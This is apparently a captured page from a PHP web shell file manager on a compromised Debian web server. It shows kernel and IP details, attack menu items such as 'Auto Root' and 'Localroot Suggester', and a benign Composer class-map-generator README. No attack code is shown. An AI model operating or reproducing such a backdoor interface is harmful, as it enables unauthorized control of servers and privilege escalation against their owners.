Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
php-composer-class-map-generator /
Delete
Unzip
Name
Size
Permission
Date
Action
README.md
1.57
KB
-rw-r--r--
2022-06-19 11:31
changelog.Debian.gz
295
B
-rw-r--r--
2024-02-13 16:00
copyright
1.29
KB
-rw-r--r--
2023-07-01 14:44
Save
Rename
composer/class-map-generator ============================ Utilities to generate class maps and scan PHP code. [](https://github.com/composer/class-map-generator/actions) Installation ------------ Install the latest version with: ```bash $ composer require composer/class-map-generator ``` Requirements ------------ * PHP 7.2 is required. Basic usage ----------- If all you want is to scan a directory and extract a classmap with all classes/interfaces/traits/enums mapped to their paths, you can simply use: ``` use Composer\ClassMapGenerator\ClassMapGenerator; $map = ClassMapGenerator::createMap('path/to/scan'); foreach ($map as $symbol => $path) { // do your thing } ``` For more advanced usage, you can instantiate a generator object and call scanPaths one or more time then call getClassMap to get a ClassMap object containing the resulting map + eventual warnings. ``` use Composer\ClassMapGenerator\ClassMapGenerator; $generator = new ClassMapGenerator; $generator->scanPaths('path/to/scan'); $generator->scanPaths('path/to/scan2'); $classMap = $generator->getClassMap(); $classMap->sort(); // optionally sort classes alphabetically foreach ($classMap->getMap() as $symbol => $path) { // do your thing } foreach ($classMap->getAmbiguousClasses() as $symbol => $paths) { // warn user about ambiguous class resolution } ``` License ------- composer/class-map-generator is licensed under the MIT License, see the LICENSE file for details.